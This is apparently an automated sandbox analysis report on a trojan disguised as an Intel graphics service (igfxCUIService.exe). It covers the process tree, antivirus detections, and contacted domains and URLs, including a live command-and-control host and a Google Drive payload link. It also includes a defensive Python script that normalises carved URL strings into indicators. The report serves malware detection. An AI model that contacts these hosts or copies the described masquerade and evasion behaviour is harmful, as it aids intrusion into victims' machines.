[Graph image not recoverable; the information carried by the graph text is kept below.]
Behavior Graph ID: 550959 | Sample: IGFXCUISERVICE | Startdate: 11/01/2022 | Architecture: WINDOWS | Score: 92
Process tree: IGFXCUISERVICE.exe started igfxCUIService.exe and powershell.exe; powershell.exe (with conhost.exe) dropped C:\ProgramData\...\igfxCUIService.exe (PE32) and C:\...\igfxCUIService.exe:Zone.Identifier (ASCII). The dropped igfxCUIService.exe (three instances) started powershell.exe, cmd.exe (several instances) and 2 other processes; its powershell.exe child started getmac.exe, WMIC.exe and conhost.exe; its cmd.exe children started reg.exe, WMIC.exe and conhost.exe; C:\ProgramData\SystemData\tempu.txt (ASCII) was dropped.
Network contacts: graphic-updater.com 23.254.131.176 port 443 (HOSTWINDSUS, United States); drive.google.com 142.250.181.238 port 443 (GOOGLEUS, United States); googlehosted.l.googleusercontent.com; 192.168.2.1 (unknown); plus 2 to 3 other IPs or domains per instance.
Signatures shown on the graph: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Encrypted powershell cmdline option found; Powershell drops PE file; Uses cmd line tools excessively to alter registry or file data; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
IGFXCUISERVICE.exe | 51% | Virustotal | | Browse
IGFXCUISERVICE.exe | 20% | Metadefender | | Browse
IGFXCUISERVICE.exe | 42% | ReversingLabs | Win32.Trojan.Fileless |
IGFXCUISERVICE.exe | 100% | Avira | TR/Redcap.rjsiq |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\ProgramData\SystemData\igfxCUIService.exe | 100% | Avira | TR/Redcap.rjsiq |
C:\ProgramData\SystemData\igfxCUIService.exe | 20% | Metadefender | | Browse
C:\ProgramData\SystemData\igfxCUIService.exe | 42% | ReversingLabs | Win32.Trojan.Fileless |

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
graphic-updater.com | 0% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link
https://graphic-updater.com/api/attach | 0% | Avira URL Cloud | safe |
https://graphic-updater.com | 0% | Virustotal | | Browse
https://graphic-updater.com | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqb | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqd | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/m6 | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqj | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqm | 0% | Avira URL Cloud | safe |
https://graphic-updater.comB | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/5 | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqo | 0% | Avira URL Cloud | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://graphic-updater.com/e6 | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/requ | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/requrlencodedW% | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/om | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/requrlencoded | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/attachM&dQ% | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqs%qPG | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/comD | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/ | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqmj | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/requrlencodedz%hPF | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/C | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/om6 | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqmv1 | 0% | Avira URL Cloud | safe |
http://crl.microsoft.co | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://graphic-updater.com/api/attachn5 | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqch | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/ll | 0% | Avira URL Cloud | safe |
http://crl.micr | 0% | URL Reputation | safe |
https://graphic-updater.com/omX | 0% | Avira URL Cloud | safe |
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq | 0% | Avira URL Cloud | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://graphic-updater.com/u | 0% | Avira URL Cloud | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://graphic-updater.com/api/req2 | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/req7 | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/attacht.com | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/req8 | 0% | Avira URL Cloud | safe |
https://graphic-updater.comcomV | 0% | Avira URL Cloud | safe |
https://csp.withgoogle.com/csp/report-to/gse_l9ocg5Eh | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/attach/ | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqC | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/req | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqm64W% | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqmx | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/attachtent.com | 0% | Avira URL Cloud | safe |
https://graphic-updater.com_ | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/P | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqdll | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/Q | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqT | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/X | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqW | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqV | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqX | 0% | Avira URL Cloud | safe |
https://graphic-updater.comcom5 | 0% | Avira URL Cloud | safe |
https://graphic-updater.comomH | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/reqdlli | 0% | Avira URL Cloud | safe |
https://graphic-updater.com/api/attachent.com | 0% | Avira URL Cloud | safe |
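Most rows in the URL table above, and in the "URLs from Memory and Binaries" list further down, are not distinct endpoints: they are the same few strings carved from process memory with a few trailing bytes of adjacent data attached (`https://graphic-updater.comcomV`, `/api/reqm64W%`, `/api/attachtent.com`). Before such a table goes into a blocklist or a detection rule it has to be folded back onto what the sample was actually seen requesting. The script below is an added example written for this report, not Joe Sandbox code. Its input list is copied from the table above; its host and endpoint allow-lists are an assumption taken only from this report's "Contacted Domains" and "Contacted URLs" sections, so a real but unobserved endpoint (if `/api/reqb` were one) would be folded onto `/api/req` and the counts are a triage aid rather than ground truth.

```python
"""Normalise URL strings carved from process memory into canonical IOCs.

Added example for the sandbox report above; it is not Joe Sandbox code.
RAW_STRINGS is copied from the report's URL table. KNOWN_HOSTS and
KNOWN_PATHS are an assumption taken only from the report's "Contacted
Domains" and "Contacted URLs" sections: the script classifies against what
the sample was actually seen requesting and reports everything else.
"""
import re
from collections import Counter

# Hosts the sandbox saw the sample resolve ("Contacted Domains").
KNOWN_HOSTS = (
    "googlehosted.l.googleusercontent.com",
    "doc-0k-2o-docs.googleusercontent.com",
    "graphic-updater.com",
    "drive.google.com",
)
# Endpoints actually requested on each host ("Contacted URLs").
KNOWN_PATHS = {
    "graphic-updater.com": ("/api/attach", "/api/req"),
    "drive.google.com": ("/uc",),
}

# Copied from the report's URL table: real endpoints mixed with carving junk.
RAW_STRINGS = [
    "https://graphic-updater.com/api/attach",
    "https://graphic-updater.com",
    "https://graphic-updater.com/api/reqb",
    "https://graphic-updater.com/m6",
    "https://graphic-updater.comB",
    "https://graphic-updater.com/api/requrlencodedW%",
    "https://graphic-updater.com/api/attachM&dQ%",
    "https://graphic-updater.com/api/reqs%qPG",
    "https://graphic-updater.comcomV",
    "https://graphic-updater.com/api/reqdll",
    "https://contoso.com/License",
    "http://crl.microsoft.co",
    "https://csp.withgoogle.com/csp/report-to/gse_l9ocaq",
    "https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu",
]

# Scheme, then the longest run of host-legal characters, then whatever is left.
URL_RE = re.compile(r"^(https?)://([A-Za-z0-9.-]+)(.*)$", re.S)


def normalise(raw):
    """Return (scheme, host, path, quality) for one carved string, or None.

    quality:
      exact            known host and a known endpoint, nothing extra
      prefix           known endpoint followed by trailing bytes (carving junk)
      host-only        known host followed by bytes that cannot be a path
      unverified-path  known host, but a path the sandbox never saw requested
      unknown-host     host outside the contacted-domain list
    """
    m = URL_RE.match(raw.strip())
    if not m:
        return None
    scheme, hostish, rest = m.groups()
    host = next((h for h in sorted(KNOWN_HOSTS, key=len, reverse=True)
                 if hostish.lower().startswith(h)), None)
    if host is None:
        return scheme, hostish.lower(), rest, "unknown-host"
    rest = hostish[len(host):] + rest      # "B", "comV", "_" fall through here
    if rest == "":
        return scheme, host, "/", "exact"
    if not rest.startswith("/"):
        return scheme, host, "/", "host-only"
    path_part = rest.split("?", 1)[0]     # a query string is not carving junk
    for endpoint in KNOWN_PATHS.get(host, ()):
        if path_part.startswith(endpoint):
            quality = "exact" if path_part == endpoint else "prefix"
            return scheme, host, endpoint, quality
    return scheme, host, path_part, "unverified-path"


def summarise(strings):
    """Collapse carved strings into canonical (host, path) IOCs plus leftovers."""
    iocs = Counter()
    leftovers = []
    for s in strings:
        hit = normalise(s)
        if hit is None:
            continue
        _scheme, host, path, quality = hit
        if quality in ("exact", "prefix", "host-only"):
            iocs[(host, path)] += 1
        else:
            leftovers.append((s, quality))
    return iocs, leftovers


if __name__ == "__main__":
    iocs, leftovers = summarise(RAW_STRINGS)
    for (host, path), n in iocs.most_common():
        print(f"{n:3d}  {host}{path}")
    for s, why in leftovers:
        print(f"     {why:15s} {s}")
```

Run against the fourteen strings above, the script collapses them to four canonical IOCs (`graphic-updater.com/api/req`, `graphic-updater.com/api/attach`, `graphic-updater.com/`, `drive.google.com/uc`) and leaves four strings for a human to look at: the unexplained `/m6` fragment and three hosts (`contoso.com`, `crl.microsoft.co`, `csp.withgoogle.com`) that never appear in the contacted-domain list and, in this report, come from PowerShell and .NET resources rather than from the sample's own traffic.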

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
graphic-updater.com | 23.254.131.176 | true | false | | unknown
drive.google.com | 142.250.181.238 | true | false | | high
googlehosted.l.googleusercontent.com | 142.250.185.129 | true | false | | high
doc-0k-2o-docs.googleusercontent.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://graphic-updater.com/api/attach | false | Avira URL Cloud: safe | unknown
https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu | false | | high
https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu | false | | high
https://graphic-updater.com/api/req | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Malicious | Antivirus Detection | Reputation (the memory dumps each string was carved from are listed under its row as Source)

https://graphic-updater.com | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqb | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqd | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp

https://doc-0k-2o-docs.googleusercontent.com/ | false | | high
    Source: igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmp

https://graphic-updater.com/m6 | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqj | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqm | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp; igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.comB | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp

https://graphic-updater.com/5 | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqo | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp

https://contoso.com/License | false | URL Reputation: safe | unknown
    Source: powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmp

https://graphic-updater.com/e6 | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp

https://graphic-updater.com/api/requ | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/api/requrlencodedW% | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/om | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/requrlencoded | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/attachM&dQ% | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp; igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqs%qPG | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/comD | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp

https://graphic-updater.com/ | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp; igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp; igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqmj | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/requrlencodedz%hPF | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/C | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/om6 | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqmv1 | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp

https://drive.google.com/ | false | | high
    Source: igfxCUIService.exe, 00000020.00000002.956121777.0000000001438000.00000004.00000020.sdmp

http://crl.microsoft.co | false | URL Reputation: safe | unknown
    Source: powershell.exe, 00000003.00000002.728563333.0000000000650000.00000004.00000040.sdmp

https://contoso.com/ | false | URL Reputation: safe | unknown
    Source: powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmp

https://nuget.org/nuget.exe | false | | high
    Source: powershell.exe, 00000003.00000002.730907422.0000000005766000.00000004.00000001.sdmp; powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmp

https://graphic-updater.com/api/attachn5 | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqch | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/ll | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp; igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp

https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eumgr32.dll | false | | high
    Source: igfxCUIService.exe, 00000020.00000002.956103538.0000000001430000.00000004.00000020.sdmp

http://crl.micr | false | URL Reputation: safe | unknown
    Source: powershell.exe, 00000007.00000003.793364315.0000000007F16000.00000004.00000001.sdmp; powershell.exe, 00000007.00000003.793470514.0000000007F17000.00000004.00000001.sdmp

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | false | | high
    Source: powershell.exe, 00000003.00000002.729637199.0000000004701000.00000004.00000001.sdmp; powershell.exe, 00000007.00000002.819681378.0000000004D91000.00000004.00000001.sdmp

https://grc-0k-2o-docs.googleusercontent.com/%%doc-0k-2o-docs.googleusercontent.com | false | | high
    Source: igfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmp

https://graphic-updater.com/omX | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp

https://csp.withgoogle.com/csp/report-to/gse_l9ocaq | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp

http://nuget.org/NuGet.exe | false | | high
    Source: powershell.exe, 00000003.00000002.730907422.0000000005766000.00000004.00000001.sdmp; powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmp

http://pesterbdd.com/images/Pester.png | false | URL Reputation: safe | unknown
    Source: powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmp

http://www.apache.org/licenses/LICENSE-2.0.html | false | | high
    Source: powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmp

https://go.micro | false | URL Reputation: safe | unknown
    Source: powershell.exe, 00000007.00000002.820903134.0000000005611000.00000004.00000001.sdmp

https://graphic-updater.com/u | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp

https://google.com/a | false | | high
    Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp

https://contoso.com/Icon | false | URL Reputation: safe | unknown
    Source: powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmp

https://graphic-updater.com/api/req2 | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.919317267.00000000014A2000.00000004.00000001.sdmp

https://graphic-updater.com/api/req7 | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/api/attacht.com | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp; igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/req8 | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.comcomV | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp

https://csp.withgoogle.com/csp/report-to/gse_l9ocg5Eh | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp

https://github.com/Pester/Pester | false | | high
    Source: powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmp

https://graphic-updater.com/api/attach/ | false | Avira URL Cloud: safe | unknown
